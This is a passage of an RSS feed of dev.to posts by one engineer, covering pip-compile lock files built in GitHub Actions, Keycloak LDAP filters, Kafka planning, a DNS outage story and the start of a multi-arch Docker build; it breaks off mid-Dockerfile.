      <guid>https://dev.to/akrisanov/generating-a-lockfile-for-python-project-using-github-actions-275d</guid>
      <description>&lt;p&gt;If you're working on a project that needs to be packaged for a specific environment other than your machine, the CI/CD server is your best friend. Products like Github Actions can save you time and the hassle of building dependencies you won't use in development.&lt;/p&gt;

&lt;p&gt;For example, many developers love Mac computers, especially the ones that come with Apple silicon. The sad truth is that we rarely deploy our code on servers running these processors or macOS. Most of the time, projects run on Linux. Unfortunately, Python can't guarantee a deterministic or reproducible environment across platforms.&lt;/p&gt;

&lt;p&gt;Running the command to create a list of all the dependencies that your package will need gives a different result on macOS, Linux, Windows, and so on:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pip-compile &lt;span class="nt"&gt;--allow-unsafe&lt;/span&gt; &lt;span class="nt"&gt;--generate-hashes&lt;/span&gt; &lt;span class="nt"&gt;--no-emit-index-url&lt;/span&gt; &lt;span class="nt"&gt;--output-file&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;requirements-lock.txt &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; requirements-lock.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;Using pip-tools to compile a requirements.txt file from your dependencies&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Not all dependencies have universal wheels. Moreover, users can install different Python versions.&lt;/p&gt;

&lt;p&gt;Now that you see the problem, let's take a quick look at possible solutions.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Build requirements-lock.txt&lt;/span&gt;

&lt;span class="na"&gt;on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;workflow_dispatch&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;

&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;build-requirements-lock&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ubuntu-22.04&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/checkout@v3&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Set up Python &lt;/span&gt;&lt;span class="m"&gt;3.9&lt;/span&gt;
        &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/setup-python@v3&lt;/span&gt;
        &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;python-version&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;3.9"&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Install pip and pip-tools&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;pip install --upgrade pip&lt;/span&gt;
          &lt;span class="s"&gt;pip install --upgrade pip-tools&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Run pip-compile&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;pip-compile --allow-unsafe --generate-hashes --no-emit-index-url --output-file=requirements-lock.txt &amp;gt; requirements-lock.txt&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Upload requirements-lock artifact&lt;/span&gt;
        &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/upload-artifact@v3.1.1&lt;/span&gt;
        &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;requirements-lock&lt;/span&gt;
          &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;requirements-lock.txt&lt;/span&gt;
          &lt;span class="na"&gt;retention-days&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;build-requirements-lock-workflow&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The Github Actions manifest above defines a workflow that can be triggered manually on any branch you like.&lt;/p&gt;

&lt;p&gt;Suppose you're upgrading some dependencies in requirements.txt. &lt;code&gt;pip install -r requirements.txt&lt;/code&gt; works fine. Now you want to generate a new lock file for the users. You commit the changes to your branch, wait for the tests to pass, and trigger the workflow:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--LvmUHVGR--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/10/Screenshot-2023-10-12-at-17.35.26.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--LvmUHVGR--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/10/Screenshot-2023-10-12-at-17.35.26.png" alt="" width="800" height="352"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Github Actions Workflow&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;A freshly generated &lt;code&gt;requirements-lock.txt&lt;/code&gt; appears among the downloadable artifacts. You download the file and commit it to the repo.&lt;/p&gt;

&lt;p&gt;Another option might be to run a similar workflow in a Docker container. I posted a note about multi-architecture builds a few months ago. &lt;a href="https://dev.to/akrisanov/building-multi-arch-images-for-arm-and-x86-2802"&gt;Take a look!&lt;/a&gt; Just make sure you build for the same architecture and Python version that you distribute your project for.&lt;/p&gt;




&lt;p&gt;Other tools like Poetry might do the job better and provide more convenient ways of managing lock files. But if you have reasons not to use them, it's totally fine to stick with good old pip.&lt;/p&gt;

</description>
      <category>github</category>
      <category>devops</category>
      <category>python</category>
    </item>
    <item>
      <title>Synchronizing Users From LDAP With Keycloak Using AD Filters</title>
      <dc:creator>Andrey Krisanov</dc:creator>
      <pubDate>Sat, 23 Sep 2023 19:32:41 +0000</pubDate>
      <link>https://dev.to/akrisanov/synchronizing-users-from-ldap-with-keycloak-using-ad-filters-25o3</link>
      <guid>https://dev.to/akrisanov/synchronizing-users-from-ldap-with-keycloak-using-ad-filters-25o3</guid>
      <description>&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--KVJBiqN1--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/09/liljeforsgeese.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--KVJBiqN1--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/09/liljeforsgeese.webp" alt="Synchronizing Users From LDAP With Keycloak Using AD Filters" width="800" height="468"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;One way to synchronize users from a third-party provider with Keycloak is a mechanism called User Federation. It can pull user entries from your corporate authentication storage over the Kerberos or LDAP protocol. However, if your organization is big enough to have a complex structure and the user directory contains many accounts, it can be challenging to fetch only the subset that belongs to particular organizational units.&lt;/p&gt;

&lt;p&gt;For example, Active Directory models a tree-based structure using the following entities:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;CN = Common Name&lt;/li&gt;
&lt;li&gt;OU = Organizational Unit&lt;/li&gt;
&lt;li&gt;DC = Domain Component&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;All the distinguished names can be found in &lt;a href="https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ldap/distinguished-names?ref=akrisanov.com"&gt;the official documentation&lt;/a&gt; provided by Microsoft.&lt;/p&gt;

&lt;p&gt;To configure a new User Federation in Keycloak, it's required to specify a User DN. This distinguished name is the base object in the directory information tree where the search for candidate authentication entries begins. Therefore, we need to know how to construct the User DN.&lt;/p&gt;

&lt;p&gt;The most basic option an Active Directory administrator has when creating user accounts is to organize them under organizational units:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;OU=Main,DC=Orgname,DC=ru
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Even if your organizational unit has a complex structure, it's still relatively easy for Keycloak to find user entries inside it – just activate the &lt;code&gt;Search Scope: Subtree&lt;/code&gt; setting when configuring the user federation. In large organizations, however, the Active Directory structure can get quite messy. Instead of using clear distinguished names, administrators sometimes do things that surprise even themselves. How about putting entries under a CN in different organizational units?&lt;/p&gt;

&lt;p&gt;This is what I encountered while working on corporate user authentication for a media platform's CMS. User entries of the editors were grouped via the Common Name, so there was no way to define the User DN as in the example above. Fortunately, the LDAP connection allows providing a filter for Active Directory. In my case, writing a filter that selects all members of the &lt;code&gt;CMS_EDITOR&lt;/code&gt; group was enough to solve the problem:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;(&amp;amp;(objectCategory=Person)(sAMAccountName=*)(|(memberOf=CN=CMS_EDITOR,OU=Security,OU=Groups,OU=Central,OU=Main,DC=Orgname,DC=ru)))
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Moreover, the &lt;code&gt;Custom User LDAP Filter&lt;/code&gt; setting in Keycloak supports logical operators like &lt;em&gt;or&lt;/em&gt; (&lt;code&gt;|&lt;/code&gt;), so I could use it to find not only the members of the editorial staff but also CMS admins, guests, etc.&lt;/p&gt;
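&lt;p&gt;For instance, a single filter can match members of several groups at once. A hypothetical variant of the filter above (the &lt;code&gt;CMS_ADMIN&lt;/code&gt; group name is made up; the DN suffix is the same):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;(&amp;amp;(objectCategory=Person)(sAMAccountName=*)(|(memberOf=CN=CMS_EDITOR,OU=Security,OU=Groups,OU=Central,OU=Main,DC=Orgname,DC=ru)(memberOf=CN=CMS_ADMIN,OU=Security,OU=Groups,OU=Central,OU=Main,DC=Orgname,DC=ru)))
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;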

</description>
      <category>keycloak</category>
      <category>authentication</category>
      <category>ldap</category>
    </item>
    <item>
      <title>Understand How Services Are Run And Operate In Production</title>
      <dc:creator>Andrey Krisanov</dc:creator>
      <pubDate>Wed, 06 Sep 2023 17:30:51 +0000</pubDate>
      <link>https://dev.to/akrisanov/understand-how-services-are-run-and-operate-in-production-2e12</link>
      <guid>https://dev.to/akrisanov/understand-how-services-are-run-and-operate-in-production-2e12</guid>
      <description>&lt;p&gt;Over the past few years, I've been interviewing dozens of software engineers who didn't know how their developed services run and operate in production. The reason for that is a rising trend in software engineering trusting in an infrastructure team, the magic of the cloud, Docker, Kubernetes, and whatnot.&lt;/p&gt;

&lt;p&gt;A conversation with a talent usually goes like this:&lt;/p&gt;

&lt;p&gt;– How do you ship your service to production?&lt;br&gt;&lt;br&gt;
– We build Docker images and run containers.&lt;br&gt;&lt;br&gt;
– Sounds cool! Can you tell me about the resource requirements for a container?&lt;br&gt;&lt;br&gt;
– Hmm, to be honest, I don't know the details. DevOps folks take care of that.&lt;br&gt;&lt;br&gt;
– (discussing Python app) OK. And what application server do you use?&lt;br&gt;&lt;br&gt;
– Application Server? (Some people even reply: "You mean WSGI?")&lt;br&gt;&lt;br&gt;
– Yes, the thing that handles web requests and runs your Python code.&lt;br&gt;&lt;br&gt;
– Hmm, let me open a project repo and check...&lt;br&gt;&lt;br&gt;
– It's...Gunicorn!&lt;br&gt;&lt;br&gt;
– Great. Can you estimate how many requests the web application can handle?&lt;br&gt;&lt;br&gt;
– I don't think so because we don't do load testing.&lt;br&gt;&lt;br&gt;
– So, it's not possible to do even a rough estimation?&lt;br&gt;&lt;br&gt;
– Nope.&lt;br&gt;&lt;br&gt;
– OK. Do you understand what happens at the process and thread level when the application server processes a request?  &lt;/p&gt;

&lt;p&gt;This is where the conversation hits a dead end. Many talents don't. And this is a red flag to me. It gets worse when a candidate claims they have experience with (semi)async services in production but can't &lt;a href="https://docs.gunicorn.org/en/stable/design.html?ref=akrisanov.com#server-model"&gt;explain the server model&lt;/a&gt; they have chosen and how the services operate because of it (including resource allocation and consumption).&lt;/p&gt;
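&lt;p&gt;For the record, the rough estimation mentioned in the dialogue fits on a napkin. A sketch with hypothetical numbers (the worker count follows the (2 × cores) + 1 rule of thumb from the Gunicorn docs):&lt;/p&gt;

```python
# Back-of-envelope throughput estimate for a synchronous Gunicorn app.
# All numbers below are hypothetical, not measured.
cores = 4
workers = 2 * cores + 1   # Gunicorn's suggested starting point: 9 workers
avg_latency_s = 0.05      # assume 50 ms per request on average

# Each sync worker handles one request at a time,
# so peak throughput is roughly workers / latency.
max_rps = workers / avg_latency_s
print(f"~{max_rps:.0f} requests/second")  # ~180 requests/second
```

A real service will fall short of this ceiling (queuing, slow clients, GC pauses), but even such a rough number is a useful answer.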

&lt;p&gt;You might say: "Why do I need to know all that low-level stuff in the 2020s?" Fair enough... if you don't develop software for thousands of users, have an unlimited budget for underutilized hardware, don't design distributed systems, or simply have an SRE team ready to solve every possible issue for you. Otherwise, please do.&lt;/p&gt;

</description>
      <category>services</category>
      <category>sre</category>
      <category>python</category>
      <category>servers</category>
    </item>
    <item>
      <title>Choosing Apache Kafka For A New Project – A Questionnaire</title>
      <dc:creator>Andrey Krisanov</dc:creator>
      <pubDate>Mon, 28 Aug 2023 22:03:22 +0000</pubDate>
      <link>https://dev.to/akrisanov/choosing-apache-kafka-for-a-new-project-a-questionnaire-285b</link>
      <guid>https://dev.to/akrisanov/choosing-apache-kafka-for-a-new-project-a-questionnaire-285b</guid>
      <description>&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--855GpXOc--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/08/Biard-Franc-ois-Auguste---The-Duke-of-Orle-ans-Descending-the-Great-Rapids-of-the-Eijampaika-on-the-Mionio-River-in-Lapland--August-1795-.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--855GpXOc--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/08/Biard-Franc-ois-Auguste---The-Duke-of-Orle-ans-Descending-the-Great-Rapids-of-the-Eijampaika-on-the-Mionio-River-in-Lapland--August-1795-.jpg" alt="Choosing Apache Kafka For A New Project – A Questionnaire" width="800" height="637"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In any modern project where there is a need to process events – a set of messages or a stream of data – developers often propose Apache Kafka as the infrastructure solution. This is not always a considered choice – where a classic broker like ActiveMQ would do, marketing sometimes prevails.&lt;/p&gt;

&lt;p&gt;But let's assume that you have deliberately chosen Kafka, or that the infrastructure team has left you no alternative. Before setting up broker parameters and writing producers and consumers, what questions should you ask yourself? To ensure a smooth start, I have prepared the following checklist/questionnaire:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;The amount of data that is going to be generated by the producers → Will &lt;strong&gt;the network channel&lt;/strong&gt; be sufficient for the entire system and its critical components? Is there an option to make use of &lt;a href="https://www.conduktor.io/kafka/kafka-message-compression/?ref=akrisanov.com"&gt;message compression&lt;/a&gt;?&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://strimzi.io/blog/2021/12/17/kafka-segment-retention/?ref=akrisanov.com"&gt;&lt;strong&gt;Data retention policy&lt;/strong&gt;&lt;/a&gt;: How long do you need to keep data? → Consider the business and data protection requirements of a product you are developing, and the cost of storing data.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Message sending guarantees (&lt;a href="https://www.conduktor.io/kafka/kafka-producer-acks-deep-dive/?ref=akrisanov.com"&gt;Acks&lt;/a&gt;)&lt;/strong&gt; → Finding the right balance between latency and reliability within replication (durability).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Message delivery guarantees&lt;/strong&gt; → How critical is message loss or duplication of messages to the business objective? Are &lt;a href="https://www.conduktor.io/kafka/idempotent-kafka-producer/?ref=akrisanov.com"&gt;idempotency&lt;/a&gt; and &lt;a href="https://www.confluent.io/blog/transactions-apache-kafka/?ref=akrisanov.com"&gt;transactionality&lt;/a&gt; needed?&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What &lt;a href="https://redpanda.com/guides/kafka-tutorial/kafka-partition-strategy?ref=akrisanov.com"&gt;partitioning strategy&lt;/a&gt; will producers use?&lt;/strong&gt; → Is the default strategy (&lt;code&gt;Default partitioner&lt;/code&gt;) appropriate?&lt;/li&gt;
&lt;li&gt;For a particular topic, is it important to store the entire message log, or are the latest changes sufficient → Consider using &lt;a href="https://docs.aiven.io/docs/products/kafka/concepts/log-compaction?ref=akrisanov.com"&gt;&lt;strong&gt;Compacted&lt;/strong&gt;&lt;/a&gt; &lt;strong&gt;&lt;a href="https://docs.confluent.io/kafka/design/log_compaction.html?ref=akrisanov.com"&gt;topics&lt;/a&gt;&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Do the created topics require a &lt;a href="https://www.conduktor.io/kafka/kafka-consumer-groups-and-consumer-offsets/?ref=akrisanov.com"&gt;consumer group&lt;/a&gt;?&lt;/strong&gt; → How do you plan to scale consumers and their bandwidth? What happens when the group is &lt;a href="https://www.verica.io/blog/understanding-kafkas-consumer-group-rebalancing/?ref=akrisanov.com"&gt;rebalanced&lt;/a&gt;?&lt;/li&gt;
&lt;/ol&gt;
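&lt;p&gt;Several of these answers end up directly in producer configuration. A sketch of what that might look like with the confluent-kafka client – the property names are real librdkafka settings, but the values are illustrative, not recommendations:&lt;/p&gt;

```python
# Hypothetical answers to the checklist, expressed as
# confluent-kafka (librdkafka) producer properties.
producer_config = {
    "bootstrap.servers": "broker-1:9092",  # hypothetical broker address
    "compression.type": "lz4",             # Q1: ease the network channel
    "acks": "all",                         # Q3: favor durability over latency
    "enable.idempotence": True,            # Q4: avoid duplicates on retries
    "partitioner": "murmur2_random",       # Q5: stick with the default strategy
}

# Passing this dict to confluent_kafka.Producer(producer_config)
# would apply the settings; here we only inspect them.
print(sorted(producer_config))
```

Most of these knobs exist under the same or similar names in the Java client as well.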

&lt;p&gt;That's it. The checklist/questionnaire is by no means exhaustive and only covers the essentials. It leaves out a lot of things such as data encryption, authentication, authorisation, and cluster configuration – assuming that the SRE team or some PaaS will take care of that for you.&lt;/p&gt;

</description>
      <category>kafka</category>
      <category>checklist</category>
      <category>sre</category>
    </item>
    <item>
      <title>My "It's not DNS" story</title>
      <dc:creator>Andrey Krisanov</dc:creator>
      <pubDate>Sat, 12 Aug 2023 12:14:55 +0000</pubDate>
      <link>https://dev.to/akrisanov/my-its-not-dns-story-1k1h</link>
      <guid>https://dev.to/akrisanov/my-its-not-dns-story-1k1h</guid>
      <description>&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fakrisanov.com%2Fcontent%2Fimages%2F2023%2F08%2Falways-dns-1024x362.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fakrisanov.com%2Fcontent%2Fimages%2F2023%2F08%2Falways-dns-1024x362.jpg" alt="My "&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Summer of 2019. I'm joining a large retail organisation that is undergoing a digital transformation. I've been hired into a technical leadership role. The project I'm taking over doesn't even have a complete team yet, which means I'll be wearing all sorts of hats until I hire someone and delegate work. You could say I'm the only "developer" on the team. Also, the code base is already serving users, and the services are part of a lead generation funnel for one of the grocery networks. So if something goes down, the company loses potential customers and revenue. The fact that the project was developed by an outsourced team that left without handing over proper documentation makes things even more complicated and fragile.&lt;/p&gt;

&lt;p&gt;In a few days, I try to understand how the services are run in production, write missing README and system design papers, and create initial tasks for maintenance. All goes well, and I manage to deploy some changes to the backend. It's Friday afternoon, so I still have time to do a rollback if I've made a mistake. But nothing suspicious has been observed during the day, and I leave the office for the weekend.&lt;/p&gt;

&lt;p&gt;The fun begins on Sunday. Because I'm in charge of the project, I'm the one who is on-call. I get a call from our support team telling me that the web application isn't responding from time to time and that they're getting complaints from customers.&lt;/p&gt;

&lt;p&gt;The first thing I do is open my browser to check what users are seeing. Surprisingly, the web page loads just fine. I hit refresh – same result. Then I turn off Wi-Fi on my iPhone and open Safari – a 504 error. It's an Nginx page. Now that's something.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fakrisanov.com%2Fcontent%2Fimages%2F2023%2F08%2FDNS.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fakrisanov.com%2Fcontent%2Fimages%2F2023%2F08%2FDNS.jpg" alt="My "&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Simplified diagram of the project architecture&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I open the monitoring and observe no high load. CPU usage is low, more than 50% of memory is free, plenty of free disk space on each of the virtual machines, no spikes in the network bandwidth. Looking at the Nginx logs only proves that there's a gateway timeout error related to the backend. I should check the application backend logs. Nothing there, no errors at all.&lt;/p&gt;

&lt;p&gt;At this point, I start to blame the network and call the network infrastructure team. These guys work at an organisational level and can potentially see what I can't. After spending an hour investigating together, we see nothing. It's already Sunday evening, and I'm almost hopeless.&lt;/p&gt;

&lt;p&gt;I decide to take a break and go for a walk. When I'm back, I try to ssh to a VM again. Suddenly, I notice a few seconds of delay before I can type my commands into the terminal. "It can't be DNS", I say to myself. To prove it, I ping a public domain from our network. Again, a few seconds of delay before the packets start flying without a hitch. "If DNS was down, the infrastructure team would notice," I continue to reason. Before escalating the situation further to upper management, I choose to check the DNS configuration on the backend virtual machines.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;/etc/resolv.conf&lt;/code&gt; is the DNS resolver configuration file. It contains records in the following format:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nameserver [ip]
nameserver [ip]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;/etc/resolv.conf&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;In my developer's mind, a Linux machine receives these records at boot time and caches them. This file is then queried to resolve domains. What could possibly go wrong? Well, I ask the infrastructure team about the IP addresses I see in &lt;code&gt;/etc/resolv.conf&lt;/code&gt; and get a surprising answer: "The IP addresses are DNS load balancers, and the first one in the list is currently down". Hearing this, I begin to understand why the SSH and ping delays are happening. The first DNS load balancer is queried, but because it's down, it doesn't respond, and resolution falls through to the second IP address after a timeout.&lt;/p&gt;

&lt;p&gt;I remove the first nameserver from &lt;code&gt;/etc/resolv.conf&lt;/code&gt; and drop the DNS cache on each of the VMs. After a few seconds, the 504 error and the gateway timeout disappear. In the morning, we'll discuss the incident with the infrastructure team and senior management. Fun week ahead.&lt;/p&gt;
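&lt;p&gt;In hindsight, the glibc resolver options could have softened the impact even with the dead balancer still listed. A hypothetical &lt;code&gt;/etc/resolv.conf&lt;/code&gt; (see &lt;em&gt;resolv.conf(5)&lt;/em&gt; for the option semantics):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;nameserver [ip]
nameserver [ip]
# fail over after 1 second, try each server twice, rotate between them
options timeout:1 attempts:2 rotate
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;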






&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;It's not DNS
There's no way it's DNS
It was DNS
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;Old Japanese Haiku&lt;/em&gt;&lt;/p&gt;

</description>
      <category>dns</category>
    </item>
    <item>
      <title>Building Multi-Arch Images for Arm and x86</title>
      <dc:creator>Andrey Krisanov</dc:creator>
      <pubDate>Thu, 10 Aug 2023 19:58:44 +0000</pubDate>
      <link>https://dev.to/akrisanov/building-multi-arch-images-for-arm-and-x86-2802</link>
      <guid>https://dev.to/akrisanov/building-multi-arch-images-for-arm-and-x86-2802</guid>
      <description>&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--5_Re3RFp--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/08/Container-Ship-Painting-by-Nicholas-Leverington.jpeg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--5_Re3RFp--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://akrisanov.com/content/images/2023/08/Container-Ship-Painting-by-Nicholas-Leverington.jpeg" alt="Building Multi-Arch Images for Arm and x86" width="800" height="443"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;© Container Ship Painting by Nicholas Leverington, United Kingdom&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;At work, I am involved in the development of a machine learning SDK and cloud services for privacy and data protection. Like almost every company in this space, we rely heavily on Python's scientific ecosystem. Because it's quite mature and depends on native library development that started years ago, getting these packages to work on new architectures can be tedious.&lt;/p&gt;

&lt;p&gt;I am one of the few developers on our team who have stuck with macOS, and I have a MacBook Pro with an M1 chip. There is no easy way for me to bootstrap our development environment in a matter of minutes. I have to use Conda, install specific versions of Python packages, patch some native libraries, and even create a symlink from an OS-specific package to its generic name (I'm talking to you, TensorFlow). People on the &lt;code&gt;x86_64&lt;/code&gt; architecture generally won't have this problem – almost every package we use comes with a pre-built wheel for a chosen OS. Moreover, to install the SDK as a dependency of, say, an HTTP API service, I had to assemble it from sources: &lt;code&gt;pip install -e '.'&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;A few months ago we didn't even support the Arm64 architecture at a build level. This changed when I introduced a GitHub Actions pipeline to build Python wheels for Linux &lt;code&gt;x86_64&lt;/code&gt;, &lt;code&gt;aarch64&lt;/code&gt;, and &lt;code&gt;universal&lt;/code&gt;. Instead of manually compiling some native libraries on my machine, I moved the work to GitHub and its Linux instances. From that moment on, I could just get the package from a private PyPI registry. The sad truth is that I still use Conda and sometimes patch one or two transitive dependencies for my M1 chip. But other than that, no hard times to date.&lt;/p&gt;

&lt;p&gt;Today I needed to distribute a newly created API service with the SDK inside as a Docker image. And I haven't found an easy way to define a Dockerfile that can be built and run on Apple Silicon without Conda:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight docker"&gt;&lt;code&gt;&lt;span class="k"&gt;FROM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s"&gt;python:3.9-slim-buster&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;AS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s"&gt;base&lt;/span&gt;

&lt;span class="k"&gt;ENV&lt;/span&gt;&lt;span class="s"&gt; PYTHONDONTWRITEBYTECODE=1&lt;/span&gt;
&lt;span class="k"&gt;ENV&lt;/span&gt;&lt;span class="s"&gt; PYTHONUNBUFFERED=1&lt;/span&gt;

&lt;span class="c"&gt;# Install Conda&lt;/span&gt;

&lt;span class="k"&gt;RUN &lt;/span&gt;apt-get update &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt-get &lt;span class="nt"&gt;-y&lt;/span&gt; upgrade
&lt;span class="k"&gt;RUN &lt;/span&gt;apt-get &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-y&lt;/span&gt; &lt;span class="nt"&gt;--no-install-recommends&lt;/span&gt; build-essential g++ gcc libssl-dev cmake git wget
